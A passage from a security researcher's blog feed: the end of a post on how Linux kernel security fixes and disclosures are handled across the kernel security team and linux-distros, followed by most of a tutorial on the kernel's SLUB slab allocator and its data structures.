id="takeaways">Takeaways</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/feeling_takeaway.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>Despite not getting to spend much time fine tuning or tweaking the tool do some in-depth analysis, it&apos;s been a fun little project and broaches an important discussion.</p><p>It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel. </p><p>Whether there&apos;s intentional omission of security relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.</p><p>For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022<sup><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">[1]</a></sup>. While the process was a bit convoluted for me, after getting in touch with the right folks, I had no issues with communication and the commit referenced the reporter, CVE and vulnerability being fixed<sup><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">[2]</a></sup>. </p><p>However, as I touched on earlier in the post, other researchers have had different experiences and the resulting patches can vary in their security relevant content. </p><h3 id="on-disclosures">On Disclosures</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/dont-make-me-go-back.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>If you want to report a kernel vulnerability, you&apos;ll typically end up staring at two pages:</p><ol><li>The official kernel documentation on &quot;Security Bugs&quot;<sup><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>[4]</sup>, </li><li>The <code>linux-distros</code> mailing list wiki page<sup><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">[5]</a></sup></li></ol><p>The tl;dr here is the kernel security team&apos;s focus is solely on finding and applying a fix for security bugs. To allocate a CVE, inform vendors of the security impact (LPE, RCE etc.) then you need to coordinate with the <code>linux-distros</code> list too.</p><p>There&apos;s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two. The most recent instance being the public disclosure of CVE-2023-0179 over on oss-security<a href="https://seclists.org/oss-sec/2023/q1/22"><sup>[6]</sup></a>. </p><p>Unfortunately I don&apos;t fully understand the root cause of the misunderstanding. As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team<sup><a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">[8]</a></sup>, as part of a wider discussion on <code>linux-distros</code> policy last year<sup><a href="https://seclists.org/oss-sec/2022/q2/99">[9]</a></sup>, but I&apos;m not entirely sure what policy this disclosure broke on the kernel documentation for &quot;Security Bugs&quot;<sup><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a></sup>.</p><p>Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if it things carry on the way they are, with Solar Designer commenting:</p><blockquote>It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?) &#xA0;On one hand, this is bad. &#xA0;On the other, everyone is tired of the inconsistencies and the drama.</blockquote><p>Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up-to-date with kernel security issues if things do go south:</p><blockquote>I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches). &#xA0;This could detect even more issues than are being brought to linux-distros and oss-security now.</blockquote><p>While somewhat ironic given the topic of this post (not that my code is fit for scale lol), its a shame that there&apos;s still discord regarding the handling of kernel security issues when this is a debate that&apos;s been going on for so many years at this point.</p><p>I don&apos;t have all the information or experience to suggest any solutions for a decades long pain point, but I do hope there&apos;s one out there and we can find it soon.</p><p>Transparency and consistency surrounding these processes helps to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors and such too, as well as help us as a community to continue to progress with regards to our attitude and approach to security.</p><hr><ol><li><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</a></li><li><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216</a></li><li><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html</a></li><li>small note, the first result on google for me is actually an older copy, from the 4.14 kernel which omits some clarity found in the latest versions</li><li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists</a></li><li><a href="https://seclists.org/oss-sec/2023/q1/22">https://seclists.org/oss-sec/2023/q1/22</a></li><li><a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">https://www.openwall.com/lists/oss-security/2022/05/24/1</a></li><li><a href="https://seclists.org/oss-sec/2022/q2/99">https://seclists.org/oss-sec/2022/q2/99</a></li><li><a href="https://seclists.org/oss-sec/2022/q4/221">https://seclists.org/oss-sec/2022/q4/221</a></li></ol><h2 id="conclusion">Conclusion</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/calming.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="227"></figure><p>Well, this one was a bit of a change of pace for me and was a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!</p><p>Hopefully I didn&apos;t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin as well as shed some light on a relevant and important topic within the community.</p><p>Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community. </p><p>Fingers crossed this was interesting for those of you that made it this far, but don&apos;t fear, I&apos;ve got some more technical posts lined up for both kernel exploitation and internals! </p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: The Slab Allocator]]></title><description><![CDATA[This time we're going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it's various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.]]></description><link>https://sam4k.com/linternals-memory-allocators-0x02/</link><guid isPermaLink="false">6311d87a92020209c38fb7ba</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 09 Nov 2022 15:04:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/09/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/09/linternals.gif" alt="Linternals: The Slab Allocator"><p>The monthly blog schedule has gone somewhat awry, but fear not, today we&apos;re diving back into our Linternals series on memory allocators!</p><p>I know it&apos;s been a while, I&apos;ve been sidetracked with the new job and some cool personal projects, so let&apos;s quickly highlight what we covered <a href="https://sam4k.com/linternals-memory-allocators-part-1">last time</a>:</p><ul><li>what we mean by memory allocators</li><li>key memory concepts such as pages, page frames, nodes and zones</li><li>piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on it&apos;s API, pros and cons</li></ul><p>This time we&apos;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and it&apos;s various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/what_you_said-makes_no_sense.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="500" height="201"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x03-the-slab-allocator">0x03 The Slab Allocator</a>
<ul>
<li><a href="#the-basics">The Basics</a></li>
<li><a href="#data-structures">Data Structures</a>
<ul>
<li><a href="#struct-kmemcache">struct kmem_cache</a></li>
<li><a href="#struct-kmemcachecpu">struct kmem_cache_cpu</a></li>
<li><a href="#struct-kmemcachenode">struct kmem_cache_node</a></li>
<li><a href="#struct-slab">struct slab</a></li>
<li><a href="#wrap-up">Wrap-up</a></li>
</ul>
</li>
<li><a href="#the-api">The API</a>
<ul>
<li><a href="#kmalloc-kfree">kmalloc &amp; kfree</a></li>
<li><a href="#kmemcachecreate">kmem_cache_create</a></li>
<li><a href="#kmemcachealloc">kmem_cache_alloc</a></li>
<li><a href="#slab-aliases">slab aliases</a></li>
</ul>
</li>
<li><a href="#seeing-it-in-action">Seeing It In Action</a>
<ul>
<li><a href="#procslabinfo">/proc/slabinfo</a></li>
<li><a href="#slabtop">slabtop</a></li>
<li><a href="#slabinfo">slabinfo</a></li>
<li><a href="#debugging">debugging</a></li>
<li><a href="#slxbtrace-ebpf">slxbtrace (ebpf)</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x03-the-slab-allocator">0x03 The Slab Allocator</h2><p>The slab allocator is the another memory allocator used by the Linux kernel and, as we touched on last time, &quot;sits on top of the buddy allocator&quot;.</p><p>What I mean by this, is that while the slab allocator is another kernel memory allocator it doesn&apos;t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we&apos;ll cover soon), but under the hood it uses the buddy allocator too.</p><p>So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to<sup><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></sup>:</p><ul><li>reduce internal fragmentation,</li><li>cache commonly used objects,</li><li>better utilise of hardware cache by aligning objects to the L1 or L2 caches</li></ul><p>So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).</p><p>Before we dive into some more detail and explain how the kernel&apos;s slab allocator achieves this, I should highlight that the term &quot;slab allocator&quot; refers to a generic memory management implementation. </p><p>The Linux kernel actually has three such implementations: SLAB<sup>[2]</sup>, SLUB and SLOB. SLUB is what you&apos;re likely to see on modern desktops and servers<sup>[3]</sup>, so <strong>we&apos;ll be focusing on this implementation</strong> through out this post, but I&apos;ll touch on the others later. </p><p>If you&apos;re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90&apos;s and you can read his paper &quot;The Slab Allocator: An Object-Caching Kernel Memory Allocator&quot; over on USENIX.<sup><a href="http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps">[4]</a> [5]</sup></p><hr><ol><li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li><li>Note that &quot;slab allocator&quot; != &quot;slab&quot; != &quot;SLAB&quot;, confusing ik</li><li>SLUB has been the default since 2.6.23 (~2008), so by likely I mean <strong><em>very likely</em></strong></li><li><a href="https://www.usenix.org/biblio-4248">http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps</a></li><li>Thanks <a href="https://infosec.exchange/web/@bsmaalders@mas.to">@bsmaalders@mas.to</a> for the reminder to include this here :) </li></ol><h3 id="the-basics">The Basics</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/let_us_begin.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="200"></figure><p>At a high level, there&apos;s 3 main parts to the SLUB allocator: <strong>caches</strong>, <strong>slabs</strong> and <strong>objects</strong>.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/simple_cache.png" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="551" height="221"></figure><p>As we can see, these form a pretty straightforward hierarchy. <strong>Objects</strong> (i.e. stuff being allocated by the kernel) of a particular type or size are organised into <strong>caches</strong>.</p><p><strong>Objects</strong> belonging to a <strong>cache</strong> are further grouped into <strong>slabs</strong>,<strong> </strong>which will be of a fixed size and contain a fixed number of <strong>objects.</strong> </p><p><strong>Objects</strong> in this context are just allocations of a particular size. For example, when a process opens a <code>seq_file</code><sup><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">[1]</a></sup> in Linux, the kernel will allocate space for <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32">struct seq_operations</a></code> using the slab allocator API. This is will be a 32 byte object. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="859" height="251" srcset="https://sam4k.com/content/images/size/w600/2022/10/simple_cache_meta-2.png 600w, https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png 859w" sizes="(min-width: 720px) 720px"></figure><p>Among other things, the cache will keep tabs on which slabs are full, which slabs a partially full and when slabs are empty. Free objects within a slab will form a linked list, pointing to the next free object within that slab.</p><p>So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object.</p><p>If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we&apos;re full circle now. The slabs themselves are allocated and freed using the buddy allocator we touched on last time.</p><p>Knowing this we can deduce that each slab is at least <code>PAGE_SIZE</code> bytes and is physically contiguous; we&apos;ll touch more on the details in a bit!</p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">https://www.kernel.org/doc/html/latest/filesystems/seq_file.html</a></li></ol><h3 id="data-structures">Data Structures</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/about_to_get_real.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!</p><p>I think the approach I&apos;ll take here is to just dive right into the data structures behind the SLUB implementation and we&apos;ll expand from there and see how it goes?!</p><p>So let&apos;s give a quick overview at some of the kernel data structures we&apos;re interested in when looking at the SLUB implementation:</p><ul><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">struct kmem_cache</a></code>: represents a specific cache of objects, storing all the metadata and info necessary for managing the cache</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>: this is a per-cpu structure which represents the &quot;active&quot; slab for a particular <code>kmem_cache</code> on that CPU (I&apos;ll explain this soon, dw!)</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">struct kmem_cache_node</a></code>: this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular <code>kmem_cache</code> on that node that aren&apos;t currently &quot;active&quot;</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code>: this structure, as you probably guessed, represents an individual slab and was introduced in 5.17<sup><a href="https://lwn.net/Articles/881039/">[1]</a></sup> (previously this information would be accessed directly from <code><a href="https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72">struct page</a></code>, but more on that soon!)</li></ul><h4 id="struct-kmemcache">struct kmem_cache</h4><figure class="kg-card kg-code-card"><pre><code class="language-C">struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;
	unsigned int object_size;
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	
#ifdef CONFIG_SLUB_CPU_PARTIAL
	unsigned int cpu_partial;
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	...
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
	...
	struct kmem_cache_node *node[MAX_NUMNODES];
};</code></pre><figcaption>comments stripped for redundancy, from <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">/include/linux/slub_def.h</a></figcaption></figure><p>As you might expect from the structure that underpins the SLUB allocator&apos;s cache implementation, there&apos;s a lot to unpack here! Let&apos;s break down the key bits. </p><p><code>name</code> stores the printable name for the cache, e.g. seen in the command <code>slabtop</code> (we&apos;ll cover introspection more later). Nothing wild here.</p><p><code>object_size</code> is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata. Wheras <code>size</code> is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same. </p><p><code>flags</code> holds the flags that can be set when creating a <code>kmem_cache</code> object. I won&apos;t go in to detail, but these can be used for debugging, error handling, alignment etc. <sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">[2]</a></sup></p><p><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83">struct kmem_cache_order_objects</a> oo</code> is a neat word-sized structure that simply contains one member: <code>unsigned int x</code>. </p><p>This is used to store both the order<sup>[3]</sup> of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values (<code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419">oo_objects()</a></code> and <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L414">oo_order()</a></code>).</p><p><code>min</code> <em>I believe</em> stores the minimum <code>oo</code> counts for slabs without any debugging or extra metadata enabled. Such that when enabling those features, the kernel can compare if <code>oo</code> has increased from <code>min</code> and decided whether to still enable them if desired. </p><p><code>reciprocal_size</code> is, well, the reciprocal of <code>size</code>. If you also don&apos;t math, this is basically the properly calculated value of <code>1/size</code>. This is used by <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L179">obj_to_index()</a></code> for determining the index of an object within a slab.</p><p><code>list</code> is a linked list of all <code>struct kmem_cache</code> on the system and is exported as <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L258">slab_caches</a></code>.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/so_far_so_good.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>So far we&apos;ve covered some of the main metadata, but now we&apos;ll dive into some of the members involved in actually facilitating allocations.</p><p><code>cpu_slab</code> is a per CPU reference to a <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>. This means that under-the-hood this is an array of sorts and each CPU uses a different index<sup><a href="https://lwn.net/Articles/452884/">[4]</a></sup>, thus having a reference to a different <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>. </p><p>We&apos;ll touch more in this structure soon, but it represents the &quot;active&quot; slab for a given CPU. This means that any allocations made by a CPU will come from this slab (or at least this slab will be checked first!). </p><p><code>node[MAX_NUMNODES]</code> on the other hand is a per node reference to a <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">struct kmem_cache_node</a></code>. This structure holds information on all the other slabs (partial, full etc.) within this node and is the next port of call after <code>cpu_slab</code>.</p><p><code>min_partial</code> defines the minimum number of slabs in a partial list, even if they&apos;re empty. Typically when a slab is empty, it will be freed back to the buddy allocator, unless there is <code>min_partial</code> or less slabs in the partial list!</p><p><code>offset</code> stores the &quot;free pointer offset&quot;. My educated guess is that this is the byte offset into an object where the free pointer (i.e. pointer to next free object in the slab) is found. This would usually be zero and probably changes with debugging/flag tweaks.</p><p><code><a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html">CONFIG_SLUB_CPU_PARTIAL</a></code> enables <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code> to not just track a per CPU &quot;active&quot; slab but also have its own per CPU partial list. After explaining the roles of <code>cpu_slab</code> and <code>node[]</code> the benefits should become clearer.</p><p><code>cpu_partial</code> and <code>cpu_partial_slabs</code> define the number of partial objects and partial slabs to keep around.</p><p><code>allocflags</code> allows a cache to define GFP flags<sup><a href="https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html">[5]</a></sup> to apply to allocations, which can determine allocator behaviour. These can also be added through the allocation API.</p><p><code>ctor()</code> lets the cache define a constructor to be called on the object during <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L1806">setup_object()</a></code> which is called when a new slab is allocated. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/yes_its_over_now.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="500" height="207"></figure><p>And that&apos;s more or less all the key fields in <code>kmem_cache</code>! Hopefully that provided some additional context around the main structure underpinning the cache implementation, and we can dive into the next two with enough context to get along.</p><p>There&apos;s of course some fields I missed out, associated with debugging, mitigations or other bits and pieces that probably didn&apos;t justify the bloat but I may come back to some time.</p><h4 id="struct-kmemcachecpu">struct kmem_cache_cpu</h4><figure class="kg-card kg-code-card"><pre><code class="language-C">struct kmem_cache_cpu {
	void **freelist;	/* Pointer to next available object */
	unsigned long tid;	/* Globally unique transaction id */
	struct slab *slab;	/* The slab from which we are allocating */
#ifdef CONFIG_SLUB_CPU_PARTIAL
	struct slab *partial;	/* Partially allocated frozen slabs */
#endif
	local_lock_t lock;	/* Protects the fields above */
#ifdef CONFIG_SLUB_STATS
	unsigned stat[NR_SLUB_STAT_ITEMS];
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">&#xA0;/include/linux/slub_def.h</a></figcaption></figure><p>Bet you&apos;re breathing a sigh of relief at that 12 liner, eh? I know I am writing this lol. Anyway, let&apos;s dive into <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>, which tracks an active slab (and partial list) for a specific CPU.</p><p><code>freelist</code> points to the next available (free) object in the active slab, <code>slab</code>. This is a <code>void **</code> as each free object contains a pointer to the next free object in the slab.</p><p><code>slab</code> points to the <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code> representing the &quot;active&quot; slab, i.e. the slab from which we&apos;re allocating from for this CPU. We&apos;ll explore this more soon.</p><p><code>partial</code> is the per cpu partial list we mentioned earlier, when <code><a href="https://cateee.net/lkddb/web-lkddb/SLUB_CPU_PARTIAL.html">CONFIG_SLUB_CPU_PARTIAL</a></code> is enabled (it should be on server/desktop). This points to a list of partially full <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/hard_time_visualising.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"><figcaption>u and me both</figcaption></figure><p>Okay so let&apos;s move away from dry member descriptions and actually look at some examples of how SLUB might serve an allocation request!</p><p>In this example lets say a kernel driver has requested to allocate a 512 byte object via the SLUB allocator API (spoiler: it&apos;s <code>kmalloc()</code>), from the general purpose cache for 512 byte objects, <code>kmalloc-512</code>. There&apos;s a couple of ways this can do down!</p><p>If <code>cache-&gt;cpu_slab-&gt;slab</code> has several free objects, things are fairly simple. The address of the object pointed to by <code>cache-&gt;cpu_slab-&gt;freelist</code> will be returned to the caller. </p><p>The <code>freelist</code> will be updated to point to the next free object in <code>cache-&gt;cpu_slab-&gt;slab</code> and relevant metadata will be updated regarding this allocation.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/11/alloc_case1-2.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="691" height="272"><figcaption>the addr of <code>new obj</code> is returned to the caller</figcaption></figure><p>Before we dive into other allocation scenarios, let&apos;s cover one more structure (sorry)!</p><h4 id="struct-kmemcachenode">struct kmem_cache_node </h4><figure class="kg-card kg-code-card"><pre><code>struct kmem_cache_node {
	spinlock_t list_lock;

	unsigned long nr_partial;
	struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
	atomic_long_t nr_slabs;
	atomic_long_t total_objects;
	struct list_head full;
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">/mm/slab.h</a></figcaption></figure><p>We&apos;re almost their folks! This structure tracks the partially full (<code>partial</code>) and full slabs for a particular node. We&apos;re talking about NUMA nodes here, which we <em>very briefly</em> touched on in the last post. </p><p>The tl;dr here is many CPUs can belong to one node. You can see your node information on Linux with the command <code>numactl -H</code>, which will let you know how many nodes you have and the CPUs that belong to each node!</p><p><code>partial</code> is a linked list of partially full <code>struct slabs</code>. The number of which is tracked by <code>nr_partial</code>, which should always be greater or equal than <code>kmem_cache-&gt;min_partial</code>, as we touched on earlier. </p><p><code>full</code> is a linked list of full <code>struct slabs</code>. Not much else to say about that!</p><p><code>nr_slabs</code> is the total number of slabs tracked by this <code>kmem_cache_node</code>. Similarly, <code>total_objects</code> tracks the total number of allocated objects.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/let_me_show_you.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>So now we have more context about the internal SLUB structures, let&apos;s take what we know and apply that to a different allocation path, using the scenario from before.</p><p>If the <code>new obj</code> returned to the caller is the last free object in <code>cache-&gt;cpu_slab-&gt;slab</code>, the &quot;active&quot; <code>slab</code> is moved into it&apos;s node&apos;s <code>full</code> list. The first slab from <code>cache-&gt;cpu_slab-&gt;partial</code> is then made the &quot;active&quot; <code>slab</code>. &#xA0;</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/alloc_case2.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="970" height="392"></figure><p>As you can imagine, there&apos;s many potential allocation paths depending on the internal cache state. Similarly, there are multiple paths when an object is freed. </p><p>I won&apos;t walk through all the possible cases here, but hopefully this post provides enough details to fill in the blanks! </p><h4 id="struct-slab">struct slab</h4><figure class="kg-card kg-code-card"><pre><code>struct slab {
	unsigned long __page_flags;

	union {
		struct list_head slab_list;
		struct rcu_head rcu_head;
#ifdef CONFIG_SLUB_CPU_PARTIAL
		struct {
			struct slab *next;
			int slabs;	/* Nr of slabs left */
		};
#endif
	};
	struct kmem_cache *slab_cache;
	/* Double-word boundary */
	void *freelist;		/* first free object */
	union {
		unsigned long counters;
		struct {
			unsigned inuse:16;
			unsigned objects:15;
			unsigned frozen:1;
		};
	};
	unsigned int __unused;

	atomic_t __page_refcount;
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">/mm/slab.h</a></figcaption></figure><p>Last, but certainly not least, on our SLUB struct tour is <code>struct slab</code>. This structure, unsurprisingly, represents a slab. Seems pretty straightforward, right?</p><p>Well, despite it&apos;s benign look, <code>struct slab</code> is hiding something. It&apos;s actually a <code>struct page</code> in disguise. Wait, what?</p><p>Until recently (5.17)<sup><a href="https://lwn.net/Articles/881039/">[6]</a></sup>, &#xA0;a slab&apos;s metadata was accessed directly via a union in the <code>struct page</code> which represented the slabs memory<sup>[7]</sup>. </p><p>While that slab information <em>is still stored in </em><code>struct page</code>, as an effort to decouple things from <code>struct page</code>, <code>struct slab</code> was created to move away from using <code>struct page</code> with the aim to move the information out of <code>struct page</code> entirely in the future. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/stay_focused.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>Anyway, with that little bit of excitement out the way, let&apos;s see what some of these fields within <code>struct page</code>, uh I mean <code>struct slab</code> are saying!</p><p>The first <code>union</code> can contain several things: <code>slab_list</code>, the linked list this <code>slab</code> belongs in, e.g. the node&apos;s <code>full</code> list; a struct for CPU partial slabs where <code>next</code> is the next CPU partial slab and <code>slabs</code> is the number of slabs left in the CPU partial list. </p><p><code>slab_cache</code> is a reference to the <code>struct kmem_cache</code> this slab belongs to.</p><p><code>freelist</code> is a pointer to the first free object in this slab.</p><p>Then we have another <code>union</code>, this time used to view the same data in different ways. <code>counters</code> is used to fetch the counters within the struct easily, whereas the struct allows granular access to each of the counters: <code>inuse</code>, <code>objects</code>, <code>frozen</code>.</p><p><code>objects</code> is a 15-bit counter defining the total number of objects in the slab, while <code>inuse</code> is a 16-bit counter use to track the number of objects in the slab being used (i.e. have been allocated and not freed). </p><p><code>frozen</code> is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are &quot;exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab&quot;.<sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74">[8]</a></sup></p><p><code>CONFIG_MEMCG</code> &quot;provides control over the memory footprint of tasks in a cgroup&quot;<sup><a href="https://cateee.net/lkddb/web-lkddb/MEMCG.html">[9]</a></sup>. Part of this includes accounting kernel memory for memory cgroups (memcgs)<sup><a href="https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt">[10]</a></sup>. Allocations made with the GFP flag <code>GFP_KERNEL_ACCOUNT</code> are accounted.</p><p><code>memcg_data</code> is used when accounting is enabled to store &quot;the object cgroups vector associated with a slab&quot;<sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433">[11]</a></sup>.</p><h4 id="wrap-up">Wrap-up</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/11/respct.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="400"></figure><p>Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that&apos;s a lot to take in; hopefully it&apos;s not <em>too</em> dry.</p><p>The aim of this section was to provide a decent foundational understanding of the SLUB 